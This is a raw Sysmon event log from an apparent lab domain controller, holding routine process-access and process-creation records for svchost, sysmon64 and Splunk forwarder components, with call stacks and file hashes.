13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-92AD-6005-BC04-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92AD-6005-BC04-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.504{59A5CD1D-92AD-6005-BC04-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92AE-6005-BD04-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-92AE-6005-BD04-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92AE-6005-BD04-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.317{59A5CD1D-92AE-6005-BD04-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.285{59A5CD1D-92AF-6005-BE04-00000000A301}26402896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92AF-6005-BE04-00000000A301}2640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 